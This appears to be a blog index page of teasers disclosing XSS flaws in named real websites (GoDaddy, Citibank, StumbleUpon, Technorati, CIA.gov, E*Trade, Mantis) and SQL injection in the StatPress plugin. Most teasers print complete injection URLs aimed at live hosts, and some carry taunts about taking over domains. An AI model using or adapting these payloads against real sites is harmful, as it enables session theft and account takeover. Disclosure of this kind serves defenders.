Mantis Bug Tracker XSS
‘Mantis is a free popular web-based bugtracking system’ – http://www.mantisbt.org/ I didn’t audit this, I don’t want to audit this, I just found it while using Mantis. There may be more, but this is...
View ArticleGodaddy.com XSS
Anyone want to take over a few domains? https://dcc.godaddy.com/DccError.aspx?sa=%22+onerror%3d%27alert(1)%27+%22...
View ArticleCitibank XSS
http://www.citibank.com/domain/contact/index.htm?_u=visitor&_uid=&_profile=%2522%2522%253e%253cimg src=%2522%2522 onerror=%2522alert(1)%2522
View ArticleMore StumbleUpon.com Bugs
Free stumbles anyone? http://www.stumbleupon.com/recover.php?email=no%40no.com%22%3E%3Cscript%3Ealert(1);%3C/script%3E http://www.stumbleupon.com/find_friend.php?q=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
View ArticleTechnorati XSS
If anyone is interested, Technorati is full of bugs like this. http://technorati.com/blogs/tag/%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E http://www.technorati.com/404please%27);alert(1);//...
View ArticleStatPress/StatPress Reloaded – SQL Injections
iriStatAppend() // URL (requested) $urlRequested = iri_StatPress_URL(); ... $referrer = (isset($_SERVER['HTTP_REFERER']) ? htmlentities($_SERVER['HTTP_REFERER']) : ''); ... $insert = "INSERT INTO " ....
View ArticleFun with E*Trade
Most of these require the user to be logged in, and for those who don’t know, the ‘expression’ technique only works on IE. You will need to use a different method if you want to test it on other...
View ArticleCIA.gov and Recovery.gov XSS
https://www.cia.gov/search?q="%20style%3d"position:absolute;top:-100px;left:-100px;width:10000px;height:10000px;z-index:999;"%20onmouseover%3d"alert(/pwn3d/)...
View ArticleRandom XSS
I have a bad habit of saving these little random bugs and telling myself that I ‘may have a need for them later’. I think thats just the paranoid security guy in me, but then again I do the same for...
View Article
More Pages to Explore .....